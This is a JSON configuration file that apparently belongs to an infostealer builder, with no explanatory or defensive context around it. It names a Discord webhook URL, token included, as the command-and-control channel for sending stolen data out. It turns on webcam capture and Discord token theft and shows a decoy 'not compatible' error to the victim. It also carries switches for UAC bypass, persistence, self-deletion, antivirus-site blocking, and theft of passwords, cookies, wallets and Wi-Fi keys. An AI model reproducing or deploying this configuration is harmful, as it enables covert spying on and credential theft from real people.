{
    "settings": {
        "c2": [
            0,
            "https://discord.com/api/webhooks/1285832601898193017/ZDhJwWDHRtSycjMu4b9-KydmEsFbhxzZ6Jp9jCfYWc7SDfejntiFEUaWK1HB9ian_dSX"
        ],
        "mutex": "0zzRHjx41Mxyp31n",
        "pingme": true,
        "vmprotect": false,
        "startup": false,
        "melt": false,
        "uacBypass": false,
        "archivePassword": "blank123",
        "consoleMode": 0,
        "debug": false,
        "pumpedStubSize": 0,
        "boundFileRunOnStartup": false
    },
    "modules": {
        "captureWebcam": true,
        "capturePasswords": false,
        "captureCookies": false,
        "captureHistory": false,
        "captureAutofills": false,
        "captureDiscordTokens": true,
        "captureGames": false,
        "captureWifiPasswords": false,
        "captureSystemInfo": false,
        "captureScreenshot": false,
        "captureTelegramSession": false,
        "captureCommonFiles": false,
        "captureWallets": false,
        "fakeError": [
            true,
            [
                "Uh Oh!",
                "This app is not compatible with your current device",
                0
            ]
        ],
        "blockAvSites": false,
        "discordInjection": false
    }
}